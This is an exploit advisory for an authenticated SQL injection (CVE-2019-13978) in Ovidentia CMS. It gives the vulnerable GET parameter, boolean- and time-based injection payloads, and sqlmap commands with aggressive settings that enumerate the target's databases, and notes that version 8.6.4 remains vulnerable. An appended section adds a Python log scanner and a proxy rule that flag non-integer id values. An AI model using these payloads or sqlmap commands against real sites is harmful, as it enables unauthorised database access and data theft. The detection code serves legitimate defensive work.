#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - SQL Injection (Authenticated)
# Date: 06/05/2019
# [ CVE-2019-13978 ]
# Exploit Author:
# Fernando Pinheiro (n3k00n3)
# Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.x < 8.6.4
# Tested on: Mac, Linux - Firefox, Safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)
URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
Using Request file
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
Using GET
./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
---
[CHANGELOG]
4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.
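
Detection (added example, not part of the original advisory or of Ovidentia): because the vulnerable field travels in a GET query string, web access logs record it, and any tg=delegat request whose id is not a plain integer is worth reviewing. The sketch below assumes combined-format access logs; the sample lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (tolerates raw spaces in the URL).
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
# Keywords matching the advisory's two payload styles (boolean-based and time-based).
SQL_HINTS = re.compile(r"\b(select|union|sleep|case\s+when|and|or)\b", re.I)

# Constructed sample log lines; 198.51.100.0/24 is a documentation range.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Aug/2019:10:00:01 +0000] "GET /ovidentia/index.php?tg=delegat&idx=mem&id=1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Aug/2019:10:00:05 +0000] "GET /ovidentia/index.php?tg=delegat&idx=mem'
    '&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))QwTg) HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Aug/2019:10:00:12 +0000] "GET /ovidentia/index.php?tg=delegat&idx=mem'
    '&id=1%20AND%203152%3D3152 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Aug/2019:10:01:00 +0000] "GET /ovidentia/index.php?tg=fileman&id=17 HTTP/1.1" 200 900',
]

def check_line(line):
    """Return a finding if the line is a tg=delegat request whose id is not an integer."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # values come back URL-decoded
    if "delegat" not in params.get("tg", []):
        return None
    bad = [v for v in params.get("id", []) if not re.fullmatch(r"\d+", v)]
    if not bad:
        return None
    value = bad[0]
    return {
        "client": line.split(" ", 1)[0],
        "id": value,
        "sql_keywords": sorted({k.lower() for k in SQL_HINTS.findall(value)}),
        "time_based": "sleep(" in value.lower(),  # a delayed response accompanies these
    }

def scan(lines):
    """Run check_line over an iterable of log lines and keep only the findings."""
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule on id, enforced at a reverse proxy or WAF in front of index.php, blocks both payload styles shown above while the application remains unpatched.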